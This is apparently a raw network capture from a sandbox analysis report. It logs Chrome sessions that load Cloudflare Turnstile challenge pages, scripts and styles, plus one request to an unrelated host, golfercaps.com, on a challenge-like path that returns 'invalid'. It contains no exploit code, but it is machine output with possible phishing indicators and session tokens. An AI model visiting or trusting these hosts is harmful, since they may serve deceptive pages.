                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                  Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                  Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.449752104.18.94.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:18 UTC761OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-Dest: iframe
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:18 UTC1362INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 26657
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                  cross-origin-embedder-policy: require-corp
                                                                  cross-origin-opener-policy: same-origin
                                                                  cross-origin-resource-policy: cross-origin
                                                                  origin-agent-cluster: ?1
                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  referrer-policy: same-origin
                                                                  document-policy: js-profiling
                                                                  2024-12-30 21:42:18 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 61 35 33 32 65 66 31 38 62 39 34 33 35 63 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                  Data Ascii: Server: cloudflareCF-RAY: 8fa532ef18b9435c-EWRalt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:18 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                  Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                  Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                  Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                  Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                  Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                  Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                  Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                  Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.449754188.114.97.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:19 UTC593OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/609964090:1735593069:6S3mpcqO1yILRgRXR0r0LjFCdbuSQ6cKt2unSWD0J4k/8fa532e0b89f421c/dHIAaNc3bgCsR5oKktnuJUphJqwfqu4osOi9Cn9zUWA-1735594936-1.2.1.1-hiLPnWAup5QiMMcYkqUgFSk0FeMKxRz.fwU8WEyUnAyFUxQygxfL_SCRekIkX5hP HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:19 UTC932INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:19 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 7
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  cf-chl-out: GKPCO1vWVKfvGlgLGf1rnMctCw8fNlFuo+w=$taAx23otGW2RkTkC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JZd6Ds8fU7zs2gVzRMbJN0V1OwvyoNdMiPJpT%2FE2XM46F6ciq9i%2BJ1wDCJmQ85IzSL2yu5JdtHOORZZ%2FmD%2FCHCz5bJtWspGCzHlcpvp16B23mE8C60CtOQ%2BhAqSigGpmvNE6QVpi5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa532f13f8472b7-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1835&min_rtt=1823&rtt_var=708&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1171&delivery_rate=1520041&cwnd=192&unsent_bytes=0&cid=2be8289ebeca565c&ts=138&x=0"
                                                                  2024-12-30 21:42:19 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                  Data Ascii: invalid


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.449755104.18.94.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:19 UTC728OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fa532ef18b9435c&lang=auto HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:19 UTC331INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:19 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 112116
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa532f32aee41d9-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:19 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                  2024-12-30 21:42:19 UTC1369INData Raw: 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66
                                                                  Data Ascii: fundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_footer_privacy":"Privacy","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if
                                                                  2024-12-30 21:42:19 UTC1369INData Raw: 2c 67 30 2c 67 36 2c 67 37 2c 67 38 2c 67 69 2c 67 74 2c 67 78 2c 67 45 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 38 32 39 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 31 36 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 35 34 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 33 36 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 33 33 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 33 30 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 39 38 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31
                                                                  Data Ascii: ,g0,g6,g7,g8,gi,gt,gx,gE,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(829))/1*(parseInt(gI(1116))/2)+parseInt(gI(554))/3*(-parseInt(gI(1436))/4)+-parseInt(gI(733))/5+-parseInt(gI(730))/6+parseInt(gI(1098))/7+parseInt(gI(1
